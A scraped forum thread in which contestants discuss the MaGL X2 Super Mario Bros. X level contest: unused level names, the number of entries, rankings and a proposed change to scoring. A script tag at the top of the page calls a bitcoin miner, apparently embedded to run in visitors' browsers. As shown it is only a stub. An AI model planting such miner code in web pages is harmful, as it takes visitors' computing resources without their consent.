<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralsmbx community

MaGL X2 Discussion - MaGL X2 Lands TOMORROW. GET. HYPE.

romajiQuadhash
typos "raocow" as "roacow" (and I TAS)
First name: Romaji Quadhash
Pronouns: ke/keh/ker

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby romajiQuadhash » 5 years ago

McKnackus wrote:So 270? Well, I guess MAGL X2 episodes will be raocow's full time job soon.

And with that, here's a bunch of easy names I got that I didn't use.

I Liked Mario Is Missing
(This one was challenging. How do you make a level that's modeled after a bad edutainment game where fetch quests and quizzes are the only form of gameplay? I could really only parody it, but since I was so new to the engine, and since I hate quiz games, I didn't bother.)

mario is missing is a good game.

This is a sig

JVyrn
Floof Incarnate

Postby JVyrn » 5 years ago

romajiQuadhash wrote:
McKnackus wrote:So 270? Well, I guess MAGL X2 episodes will be raocow's full time job soon.

I Liked Mario Is Missing
(This one was challenging. How do you make a level that's modeled after a bad edutainment game where fetch quests and quizzes are the only form of gameplay? I could really only parody it, but since I was so new to the engine, and since I hate quiz games, I didn't bother.)

oh hey XANA

Ivy

Postby Ivy » 5 years ago

Luigi in a Lake
(Wasn't sure what this could be. Swimming levels are difficult to pull off.)

Fertile Competition Bake
(This was an easy level name?)

Fast Luck Environment
(Would've been based on Vegas. I was half tempted to make a RNG level where you had to be both fast and lucky to win, but those usually don't go well. In hindsight I can think of a few ways to make it work. Maybe in the future.)

I Liked Mario Is Missing

Those seem like the bottom of the barrel for Easy names. Surprised that wasn't Medium.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

McKnackus
Nobody ex-CAWCAW

Postby McKnackus » 5 years ago

Ivy wrote:

Luigi in a Lake

Fertile Competition Bake

Fast Luck Environment
(Would've been based on Vegas. I was half tempted to make a RNG level where you had to be both fast and lucky to win, but those usually don't go well. In hindsight I can think of a few ways to make it work. Maybe in the future.)

I Liked Mario Is Missing

Those seem like the bottom of the barrel for Easy names. Surprised that wasn't Medium.
The name I choose was actually super generic. In fact I wouldn't be surprised if there were already 50 other levels with the same name elsewhere in other fangames. Honestly my level is probably not very original, but I don't recall seeing it being done quite like I did it, so maybe not? oh well.

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 5 years ago

aww great this ended and I still haven't started my level

271st place yyeeeeaaah. I need to learn the engine better when I'm not swamped with schoolwork and too demotivated to figure out the engine, oh well
i've honestly never played a video game in my life

Ditocoaf
Haustone Tournament Finalist
Pronouns: he/him/his

Postby Ditocoaf » 5 years ago

I think I'll only be disappointed if I'm in the bottom quarter. If I'm in the second quarter, I'll be like "yeah, that sounds about right", and if I'm anywhere in the top half I'll be super stoked.

I'm actually very happy with how my level turned out, considering I did it in a day and it's my first smbx level ever completed, but those circumstances necessarily had an effect on the outcome.

7NameSam
hey
Pronouns: they/she

Postby 7NameSam » 5 years ago

Here are the level names I didn't choose

Morton Koopa's River
SMB1 Chain Chomp
Tranquil
Dear Nod's House

they are easy levels

romajiQuadhash
typos "raocow" as "roacow" (and I TAS)
First name: Romaji Quadhash
Pronouns: ke/keh/ker

Postby romajiQuadhash » 5 years ago

JVyrn wrote:
romajiQuadhash wrote:

I Liked Mario Is Missing

oh hey XANA
Not Quite. There's some key diffrences.
... I probabaly should change my insigna
This is a sig

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 5 years ago

Ivy wrote:

Luigi in a Lake

Fertile Competition Bake

Fast Luck Environment

I Liked Mario Is Missing

Difficulty is based on patterns and the likelihood of you getting a word salad, basically. With easy, that likelihood is relatively low, but it can happen. With hard, particularly with one pattern, you COULD end up with a super easy two word name. But then again, you could end up with something like "Can We Please Stop Talking About Lyrical Bread? If We Don't, the Swoopers Win."

It's not so much in terms of the product as the possibility of the product. Last year was more about the product, but I couldn't do it in the same way as last year because I had to generate literally double the amount of names in the same amount of time and thus built a program to ease my process considerable.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Kerkec

Postby Kerkec » 5 years ago

the only things about my level that I'm not satisfied with are the foreground tiles in the second section and the text for the entire thing
they were both meant to just be placeholders but ended up being the final thing (largely due to general laziness and burnout rather than time constraints, but ah well)

everything else I'm pretty proud of for being my first smbx experience, but I don't know how it's gonna stack up to the others here, I'm sure there's gonna be some amazing stuff

I feel confident that I could potentially deserve somewhere slightly above or at least around 100, but that depends on just how much amazing stuff there is, I suppose, because I wouldn't call mine "amazing" exactly (and for all I know, my level could be way too hard or horribly broken in some unforeseeable way to me, so...)

in any case, 267 entries, huh
good luck, judges, please don't die

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 5 years ago

Some people were talking about making levels out of the rejected level names, so I made a thread listing them.

I don't view that as officially "kicking off" any project that uses them, I just thought it was worth putting down the names I'd gathered up. Right now it's just what I could find in last year's names; Horikawa said that she kept track of all the names this year, so there isn't a need to go digging through this thread for them.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Fawriel

Postby Fawriel » 5 years ago

I know the contest is over already, but... Is there a way to make SMBX accept a mask for a sprite that doesn't normally have one? Juggling all these blocks and which ones can be used for what is so incredibly cumbersome...

Rednaxela
Maker of Shenanigans

Postby Rednaxela » 5 years ago

Fawriel wrote:I know the contest is over already, but... Is there a way to make SMBX accept a mask for a sprite that doesn't normally have one? Juggling all these blocks and which ones can be used for what is so incredibly cumbersome...
Nope. Blocks without a mask file cannot be given a custom mask file.

Alice
Pronouns: Girl person

Postby Alice » 5 years ago

Looks like I need to at least take 239th place at the very lowest to tie my entry from last year. I'm setting my goal for 120th place despite it being rather optimistic though. Considering that my level this year was actually complete though (as opposed to last year's part of one subsection that didn't even work properly and a small bonus area) I'm confident I can at least beat 239th place.

Isrieri
Creatively Bankrupt
Pronouns: Male

Postby Isrieri » 5 years ago

Kerkec wrote:good luck, judges, please don't die
I'd like to echo that sentiment. I'm kind of glad I didn't make the cut now. I shudder to think how long its going to take.

Any conceptual ideas for the hub yet?

Unaniem
Desperately trying to figure out just what the hell
First name: Tree

Postby Unaniem » 5 years ago

Isrieri wrote:
Kerkec wrote:good luck, judges, please don't die
I'd like to echo that sentiment. I'm kind of glad I didn't make the cut now. I shudder to think how long its going to take.
Same here, haha
It's gonna be freaking August when the LP is finished holy heckle.

S.N.N.

Postby S.N.N. » 5 years ago

Re: the huge amount of entries

I'm curious as to how this whole thing is going to be handled at this point. It's clear that Horikawa didn't anticipate this many entries (no one did), and I think it goes without saying that there are going to be a lot of rankings that are off if the judging is done from an arbitrary numerical standpoint. I'm almost wondering if picking a top 10-20, and then clustering the rest based on general quality would work better (i.e. put 15ish levels in a world that are "pretty good", another 15ish levels in another world that are "poor", etc). At the very least, it would shut down any "why did 220th rank higher than 223rd" arguments that are bound to pop up.

Then again, I'm just musing. It's probably too late to change around the judging criteria, and I doubt the judges would want to.

ano0maly
Discord User

Postby ano0maly » 5 years ago

I suggest putting the scores in BIG CAPS and the rankings in a minimal font size
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

CapedLuigisYoshi
some sort of fangirl
Pronouns: she/her

Postby CapedLuigisYoshi » 5 years ago

phew my name is on the "received" list
*shrug*

The Destroyer of Worlds
I am become death

S.N.N. wrote:Re: the huge amount of entries

I'm curious as to how this whole thing is going to be handled at this point. It's clear that Horikawa didn't anticipate this many entries (no one did), and I think it goes without saying that there are going to be a lot of rankings that are off if the judging is done from an arbitrary numerical standpoint. I'm almost wondering if picking a top 10-20, and then clustering the rest based on general quality would work better (i.e. put 15ish levels in a world that are "pretty good", another 15ish levels in another world that are "poor", etc). At the very least, it would shut down any "why did 220th rank higher than 223rd" arguments that are bound to pop up.

Then again, I'm just musing. It's probably too late to change around the judging criteria, and I doubt the judges would want to.
there's no such thing as perfect judging. it's silly to consider the judging that'll result from this as anything near 'accurate' as there is no ideal goal with which to compare.

Last year, despite a couple exceptions, we had judgements the majority of the people agreed with. That's what I'm aiming for and I feel confident I can get it.

I was expecting about 150-250. Said so in my emails to the judges. This wasn't entirely unexpected and I built the infrastructure to support it quite some time ago. What was absolutely unexpected was the number of levels that would be submitted *at the last minute*.

But yeah, just calm down, relax, trust me, and enjoy the ride peeps. It'll be a fun one, I guarantee it!
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 5 years ago

S.N.N. wrote:Re: the huge amount of entries

Horikawa Otane wrote:
I would not be happy if the judging criteria itself was changed after already expecting the number-based system we were told about... if this was discussed in advance for next time, obviously go ahead and do whatever for the next event, but we already have expectations and I guess I'm really not partial to plans being changed when I'm already involved with something =w=

I'm also just a personal fan of critical, exact measurements of things and not vague areas of categorization, but that's just me personally :x It's why I hate letter grades in school, because one person's A- was objectively better than the other person beside them who also got A- on the test, but they're rewarded with the same thing.
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

Ivy

Postby Ivy » 5 years ago

RenaTurnip wrote: I'm also just a personal fan of critical, exact measurements of things and not vague areas of categorization, but that's just me personally :x It's why I hate letter grades in school, because one person's A- was objectively better than the other person beside them who also got A- on the test, but they're rewarded with the same thing.
Last year's contest showed the actual points out of 100 on the level descriptions, so there's always that to look at.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

The Destroyer of Worlds
I am become death

One thing I AM thinking about is changing the gimmick scoring to 5/5 rather than 10/10. Then increasing the fun scoring to 25/25 to compensate.

The reason for this is that I've seen some really good levels that kinda ignored the character side of the gimmick get unfairly unpunished because of that. I think that maybe the gimmick should be able to provide an edge, but not hurt a score as much as it is currently.

This would require the rejudging of a couple levels, but at this stage it wouldn't be too bad.

Thoughts?

Ignoritus
O◡O
Pronouns: he/him/his

Postby Ignoritus » 5 years ago

Horikawa Otane wrote:One thing I AM thinking about is changing the gimmick scoring to 5/5 rather than 10/10. Then increasing the fun scoring to 25/25 to compensate.

The reason for this is that I've seen some really good levels that kinda ignored the character side of the gimmick get unfairly unpunished because of that. I think that maybe the gimmick should be able to provide an edge, but not hurt a score as much as it is currently.

This would require the rejudging of a couple levels, but at this stage it wouldn't be too bad.

Thoughts?
No doubt. To be honest, if it weren't too late for that I'd have advised removing the character side of the gimmick altogether from scoring. it seems to me like a lot of people were absolutely baffled with what exactly was expected to make use of their character that wouldn't end up being forced usage of Peach's hover or the unique hammer suits or something similar that would have ended up being in every single level just for character usage points until everyone was absolutely sick of it.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 years ago

all I know is that if I get 164 instead of 163 I'm going to FLIP SO MANY TABLES IN RAGE
the chillaxest of dragonsImage
ImageImage

Return to “archive”